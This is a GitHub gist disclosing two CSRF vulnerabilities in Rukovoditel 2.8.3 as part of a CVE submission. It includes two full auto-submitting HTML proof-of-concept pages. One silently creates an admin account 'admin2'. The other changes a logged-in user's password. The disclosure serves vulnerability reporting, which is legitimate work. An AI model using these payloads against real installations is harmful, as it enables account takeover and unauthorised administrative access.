Skip to content

Instantly share code, notes, and snippets.

@victomteng1997

victomteng1997/Rukovoditel_CVE_submission.md

Last active April 5, 2021 06:01
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save victomteng1997/d5f2db1d37aed5792c28685068ec41e2 to your computer and use it in GitHub Desktop.
Save victomteng1997/d5f2db1d37aed5792c28685068ec41e2 to your computer and use it in GitHub Desktop.
Download ZIP
Two CSRF vulnerabilities identified at Rukovoditel Project Management App
Raw
Rukovoditel_CVE_submission.md

The official github of the project is: https://github.com/Rukovoditel/Rukovoditel, but hasn't been updated for a long time. The source code of the software can be downloaded at: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_2.8.3.zip/download

Vulnerabilities description

  1. Attacker may exploit the CSRF vulenrability to add user with admin privilege. Process: (1) Admin login to his own account with correct credential. (2) The advesary crafts the following web page with an username "admin2" and password "admin2", and hosts it online.
<html>
<head>
<title>CSRF add admin user</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
	var count = 2;
	var i=0;
    
	for(i=0; i<count; i++)
	{
    	document.forms[i].submit();
	}
}
</script>
<H2>Cross Site Request Forgery</H2>
<form method="POST" name="form1" action="http://localhost/rukovoditel/index.php?module=users/validate_form">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="useremail" value="admin@admin.com"/>
</form>
<form method="POST" name="form0" action="http://localhost/rukovoditel/index.php?module=items/&action=save">
<input type="hidden" name="path" value="1"/>
<input type="hidden" name="redirect_to" value=""/>
<input type="hidden" name="parent_item_id" value="0"/>
<input type="hidden" name="fields[5]" value="1"/>
<input type="hidden" name="fields[14]" value="default"/>
<input type="hidden" name="fields[6]" value="0"/>
<input type="hidden" name="fields[12]" value="admin2"/>
<input type="hidden" name="password" value="admin2"/>
<input type="hidden" name="fields[7]" value="admin2"/>
<input type="hidden" name="fields[8]" value="lastname"/>
<input type="hidden" name="fields[10]" value="lastname"/>
<input type="hidden" name="fields[9]" value="admin2@admin.com"/>
<input type="hidden" name="fields[13]" value="english.php"/>
</form>
</body>
</html>

(3) Once the admin visit such website, he will create a new user with username "admin2" and password "admin2".

  1. Attacker may exploit the CSRF vulenrability to change admin password. Process: (1) Admin login to his own account with correct credential. (2) The advesary crafts the following web page with a new password ("newpassword"), and hosts it online.
<html>
<head>
<title>CSRF change password</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
	var count = 1;
	var i=0;
    
	for(i=0; i<count; i++)
	{
    	document.forms[i].submit();
	}
}
</script>
<H2>Cross Site Request Forgery (Edit Existing Admin details)</H2>
<form method="POST" name="form0" action="http://localhost/rukovoditel/index.php?module=users/change_password&action=change">
<input type="hidden" name="password_new" value="newpassword"/>
<input type="hidden" name="password_confirmation" value="newpassword"/>
</form>
</body>
</html>

(3) For anyone (including admin) who logged in to the account and visited this website, his credential will be changed to new password ("newpassword").

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment